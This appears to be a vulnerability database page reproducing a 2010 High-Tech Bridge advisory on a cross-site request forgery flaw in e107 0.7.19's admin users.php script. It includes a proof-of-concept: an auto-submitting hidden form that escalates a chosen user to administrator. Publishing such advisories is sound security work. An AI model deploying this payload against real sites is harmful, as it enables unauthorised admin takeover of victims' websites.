Lucene search

K

e107 0.7.19 Cross Site Request Forgery

🗓️ 20 Apr 2010 00:00:00Reported by High-Tech Bridge SAType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 13 Views

e107 0.7.19 Cross Site Request Forgery vulnerability in users.php scrip

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`Vulnerability ID: HTB22344  
Reference: http://www.htbridge.ch/advisory/xsrf_csrf_in_e107.html  
Product: e107 Website System  
Vendor: e107  
Vulnerable Version: 0.7.19 and Probably Prior Versions  
Vendor Notification: 05 April 2010   
Vulnerability Type: CSRF (Cross-Site Request Forgery)  
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response  
Risk level: Medium   
Credit: High-Tech Bridge SA (http://www.htbridge.ch/)   
  
Vulnerability Details:  
The vulnerability exists due to failure in the /e107_admin/users.php script to properly verify the source of HTTP request.   
  
Successful exploitation of this vulnerability could result in a compromise of the application, disclosure or modification of sensitive data.   
  
Attacker can use browser to exploit this vulnerability. The following PoC is available:   
  
  
<form method=POST action=http://host/e107_admin/users.php name=main>  
<input type=hidden name=userid value=2>  
<input type=hidden name=userip value=1.2.3.4>  
<input type=hidden name=useraction value=admin>  
</form>  
<script>  
document.main.submit();  
</script>  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
20 Apr 2010 00:00Current
0.5Low risk
Vulners AI Score0.5
13
.json
Report